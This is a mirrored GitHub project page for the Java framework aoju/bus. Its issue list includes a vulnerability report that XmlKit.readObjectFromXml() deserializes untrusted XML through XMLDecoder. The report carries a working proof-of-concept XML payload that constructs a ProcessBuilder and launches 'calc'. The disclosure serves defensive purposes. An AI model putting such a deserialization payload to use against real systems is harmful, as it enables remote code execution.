Giter Site home page Giter Site logo

aoju / bus Goto Github PK

View Code? Open in Web Editor NEW
386.0 14.0 87.0 290.52 MB

Bus 是一个基础框架、服务套件,它基于Java8编写,参考、借鉴了大量已有框架、组件的设计,可以作为后端服务的开发基础中间件。代码简洁,架构清晰,非常适合学习使用。

Home Page: http://www.aoju.org

License: MIT License

Java 99.48% FreeMarker 0.52%
bus limiter logger vaildate swagger tracer proxy socket storage sensitive

bus's People

Contributors

839536 avatar bergfish avatar cuitengf avatar dependabot[bot] avatar jayguojianhai avatar justubborn avatar tangcent avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

lihai211 triplehack smallant3158 akaxk abstractfive halleyhaoyu notow666 lcc214321 ne1403 raylei1234 arnoldzhou wuxiaonai marketxing1 laitaiyang huwenhai jsohpill hunshikan yangheqingvip bergfish guojingfu 348840275 luchao0111 rebeccaqn yizuoming beixinjing berkoo cairshine zhanglei erickwang jwangkun jingshuai5213 meidea q040407 lonpo 839120 chiva-zhao lyztx1024 fengzi12 dreamln smile2049 touhousupports paperscz cliveyao jianbridge sfg11 guanjd fireinrain learn-knowlege xhgrid jiyulongxu xeon-ye yansdouble usbwc aiononhiii keydancer2 xiaoyue6 lv-jack shuaibicool sailychen wlr19982cc brucebrucezheng zyj0021 wj307439123 ccoderjava mrstierchen 0zu-cc dystudio doslee yjjn sixtreehall candyking1991 qianniaoge arun-prabhakar cckmit tomdev2008 edgeowner zyy20009619 sdmq zirandu ismart-yuxi phial3 mimi1988 jiji87432 gulin13 dxxfire itsharex lerkunkun

bus's Issues

建议加上test

作者整理的挺好的,但是如果能加上test,对于使用者来说就容易上手一些。

Remote Code Execution caused by XmlUtils.readObjectFromXml() via untrusted XML String

Description

bus-core provides XML utility classes that may be vulnerable to remote code execution when using XmlKit.readObjectFromXml() to interpret untrusted XML strings.

Detail

The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability.

Version

<= 8.0.0

POC

    import org.aoju.bus.core.toolkit.XmlKit;
    import org.xml.sax.InputSource;
    
    import java.io.StringReader;
    
    public class MyTest {
    
        private static final String XML_STR = "<java>\n" +
            "    <object class=\"java.lang.ProcessBuilder\">\n" +
            "        <array class=\"java.lang.String\" length=\"1\">\n" +
            "            <void index=\"0\">\n" +
            "                <string>calc</string>\n" +
            "            </void>\n" +
            "        </array>\n" +
            "        <void method=\"start\"></void>\n" +
            "    </object>\n" +
            "</java>\n";
    
        public static void main(String[] args) {
            XmlKit.readObjectFromXml(new InputSource(new StringReader(XML_STR)));
        }
    }

Attack

image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.